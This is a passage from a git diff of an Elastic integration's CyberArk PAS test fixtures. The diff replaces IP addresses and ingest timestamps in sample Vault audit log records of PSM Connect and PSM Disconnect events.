Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UseSudoOnReconcile\" Value=\"Yes\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "PSM Connect", "issuer": "Administrator", "extra_details": { @@ -2107,15 +1833,15 @@ "application_type": "PSMP-SSH", "psmid": "PSMServer", "session_id": "8b222ac9-c2ad-49ea-9c4e-6829940f58d4", - "src_host": "81.32.170.205", - "dst_host": "34.123.103.115" + "src_host": "67.43.156.13", + "dst_host": "67.43.156.15" }, "rfc5424": true, "ca_properties": { "other": { "use_sudo_on_reconcile": "Yes" }, - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "failure", "policy_id": "UnixSSH", @@ -2128,9 +1854,9 @@ "cpm_error_details": "First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031", "last_fail_date": "1615888216" }, - "file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", + "file": "Root\\Operating System-UnixSSH-67.43.156.15-testark", "safe": "partner", - "station": "34.71.250.247", + "station": "67.43.156.15", "action": "PSM Connect", "timestamp": "Mar 16 03:04:51", "desc": "PSM Connect" @@ -2141,8 +1867,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:30.936307800Z", - "original": "\u003c5\u003e1 2021-03-16T10:04:51Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 16 03:04:51\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-16T10:04:51Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b222ac9-c2ad-49ea-9c4e-6829940f58d4;SrcHost=81.32.170.205;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"4\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615888216\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UseSudoOnReconcile\\\" Value=\\\"Yes\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 16 03:04:51\",\"IsoTimestamp\":\"2021-03-16T10:04:51Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-34.123.103.115-testark\",\"Station\":\"34.71.250.247\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b222ac9-c2ad-49ea-9c4e-6829940f58d4;SrcHost=81.32.170.205;User=testark;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"4\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615888216\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"UseSudoOnReconcile\",\"Value\":\"Yes\"}]}}}}", + "ingested": "2021-12-09T13:36:47.331215300Z", + "original": "\u003c5\u003e1 2021-03-16T10:04:51Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 16 03:04:51\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-16T10:04:51Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b222ac9-c2ad-49ea-9c4e-6829940f58d4;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"4\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615888216\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UseSudoOnReconcile\\\" Value=\\\"Yes\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 16 03:04:51\",\"IsoTimestamp\":\"2021-03-16T10:04:51Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b222ac9-c2ad-49ea-9c4e-6829940f58d4;SrcHost=67.43.156.13;User=testark;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"4\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615888216\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"UseSudoOnReconcile\",\"Value\":\"Yes\"}]}}}}", "code": "300", "kind": "event", "action": "psm connect", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-302-psm-disconnect.log b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-302-psm-disconnect.log index c172f644c9f..06567eb4180 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-302-psm-disconnect.log +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-302-psm-disconnect.log @@ -1,16 +1,16 @@ {"format":"elastic","version":"1.0","raw":"\n \n no\n Cyber-Ark\n Vault\n 11.6.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n Linux\n Root\\Operating System-LINUX-SSH-radiussrv.cyberark.local-admin2\n 10.2.0.7\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=radiussrv.cyberark.local;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:07;SessionID=35fac41e-22b5-11eb-83ca-000c297aae88;SrcHost=10.2.0.6;User=admin2;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n","syslog":{"audit_record":{"Rfc5424":"no","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.6.0000","MessageID":"302","IsoTimestamp":"2021-03-16T15:01:00Z","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"Linux","File":"Root\\Operating System-LINUX-SSH-radiussrv.cyberark.local-admin2","Station":"10.2.0.7","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=radiussrv.cyberark.local;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:07;SessionID=35fac41e-22b5-11eb-83ca-000c297aae88;SrcHost=10.2.0.6;User=admin2;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"LINUX-SSH"},{"Name":"UserName","Value":"admin2"},{"Name":"Address","Value":"radiussrv.cyberark.local"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"CPMDisabled","Value":"No Reason"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"Customer","Value":"Tesla"}]}}}} -<5>1 2021-03-11T17:38:26Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:26\n 2021-03-11T17:38:26Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 81.32.170.205\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:13;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:26","IsoTimestamp":"2021-03-11T17:38:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:13;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-11T17:47:01Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:47:01\n 2021-03-11T17:47:01Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 81.32.170.205\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:11;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:47:01","IsoTimestamp":"2021-03-11T17:47:01Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:11;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-11T17:48:40Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:48:40\n 2021-03-11T17:48:40Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 81.32.170.205\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:48:40","IsoTimestamp":"2021-03-11T17:48:40Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-11T17:55:02Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:55:02\n 2021-03-11T17:55:02Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 81.32.170.205\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:55:02","IsoTimestamp":"2021-03-11T17:55:02Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-11T17:56:42Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:56:42\n 2021-03-11T17:56:42Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 81.32.170.205\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:56:42","IsoTimestamp":"2021-03-11T17:56:42Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-11T20:23:30Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 12:23:30\n 2021-03-11T20:23:30Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 81.32.170.205\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 12:23:30","IsoTimestamp":"2021-03-11T20:23:30Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-14T13:49:54Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:49:54\n 2021-03-14T13:49:54Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:18;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=81.32.170.205;User=testark;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:49:54","IsoTimestamp":"2021-03-14T13:49:54Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:18;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=81.32.170.205;User=testark;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-14T13:51:35Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:51:35\n 2021-03-14T13:51:35Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:54;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=81.32.170.205;User=testark;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:51:35","IsoTimestamp":"2021-03-14T13:51:35Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM 